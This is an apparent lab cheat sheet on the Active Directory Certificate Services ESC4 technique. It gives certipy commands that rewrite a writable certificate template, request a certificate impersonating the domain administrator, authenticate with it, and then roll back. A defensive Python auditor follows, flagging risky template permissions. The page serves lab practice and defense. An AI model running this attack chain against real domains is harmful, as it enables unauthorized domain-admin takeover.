ADCS - ESC4

Vulnerable Certificate Template Access Control — ESC4

Certificate templates are securable objects in Active Directory, meaning they have a security descriptor that specifies which Active Directory principals have specific permissions over the template.

Find vulnerable templates (certipy flags ESC4 when a principal we control has write-class rights over a template):

sudo certipy find -u joaquin.Pereida@maryland.local -p 'horse' -vulnerable -dc-ip 192.168.56.12 -stdout

  • Take the ESC4 template and change it to be vulnerable to the ESC1 technique, using the GenericWrite right we hold over it. No -target is given here because this command talks to LDAP rather than to the CA. Keep -save-old so the original configuration is written out (ESC4.json) for the rollback step at the end.

sudo certipy template -u joaquin.Pereida@maryland.local -p 'horse' -template ESC4 -save-old -debug

  • Exploit ESC1 on the modified ESC4 template:

sudo certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target salisbury.maryland.local -template ESC4 -ca MARYLAND-CA -upn administrator@maryland.local

  • Authenticate with the PFX:

sudo certipy auth -pfx administrator.pfx -dc-ip 192.168.56.12

  • Roll back the template configuration:

certipy template -u joaquin.Pereida@maryland.local -p 'horse' -template ESC4 -configuration ESC4.json
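A defender's counterpart to the find step above, added here as an example (not certipy's code and not part of the original page): it parses a template's security descriptor in SDDL form and reports allow-ACEs that grant write-class rights (GenericAll, GenericWrite, WriteDacl, WriteOwner, WriteProperty) to principals outside an assumed set of trusted admin groups. The sample descriptor and the TRUSTED set are constructed assumptions.

```python
"""Audit a certificate template's DACL (SDDL form) for ESC4-style write access."""
import re

# Active Directory access-mask bits, used when SDDL gives the rights as hex.
GENERIC_ALL, GENERIC_WRITE = 0x10000000, 0x40000000
WRITE_DAC, WRITE_OWNER, WRITE_PROP = 0x00040000, 0x00080000, 0x00000020
RIGHT_BITS = {"GA": GENERIC_ALL, "GW": GENERIC_WRITE, "WD": WRITE_DAC,
              "WO": WRITE_OWNER, "WP": WRITE_PROP}
WRITE_MASK = sum(RIGHT_BITS.values())

# Principals expected to edit templates (SDDL aliases; an assumption, tune per domain).
TRUSTED = frozenset({"EA", "DA", "SY", "BA"})

ACE_RE = re.compile(r"\(([^()]*)\)")

# Constructed sample DACL: admins hold GenericAll as expected, Authenticated Users
# have read/enroll-class rights, and one ordinary group has GenericWrite (ESC4).
SAMPLE_SDDL = ("O:EAG:EAD:PAI(A;;GA;;;EA)(A;;GA;;;DA)(A;;CCLCSWRPRC;;;AU)"
               "(A;;GW;;;S-1-5-21-1-2-3-1105)")

def rights_mask(rights: str) -> int:
    """Turn an SDDL rights field (hex or two-letter tokens) into an access mask."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    mask = 0
    for i in range(0, len(rights), 2):
        mask |= RIGHT_BITS.get(rights[i:i + 2], 0)  # read-class tokens add nothing
    return mask

def find_esc4_aces(sddl: str, trusted=TRUSTED) -> list:
    """Return allow-ACEs granting write control over the template to untrusted SIDs."""
    findings = []
    dacl = sddl.split("D:", 1)[1] if "D:" in sddl else ""
    for ace in ACE_RE.findall(dacl):
        ace_type, _flags, rights, obj_guid, _inherit, sid = ace.split(";")[:6]
        if ace_type not in ("A", "OA") or sid in trusted:
            continue  # deny ACEs and expected admins are not findings
        mask = rights_mask(rights) & WRITE_MASK
        if mask:
            granted = sorted(name for name, bit in RIGHT_BITS.items() if mask & bit)
            # WP limited to one property GUID is narrower; report the scope so the
            # reviewer can judge whether that property matters (name flags, EKUs).
            findings.append({"sid": sid, "rights": granted, "scoped_to": obj_guid or None})
    return findings

if __name__ == "__main__":
    for f in find_esc4_aces(SAMPLE_SDDL):
        print(f"ESC4 candidate: {f['sid']} has {','.join(f['rights'])}")
```

Feed it the nTSecurityDescriptor of each template under CN=Certificate Templates in the Configuration partition (converted to SDDL) to get the same class of finding certipy reports, plus the exact principal and right to fix.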
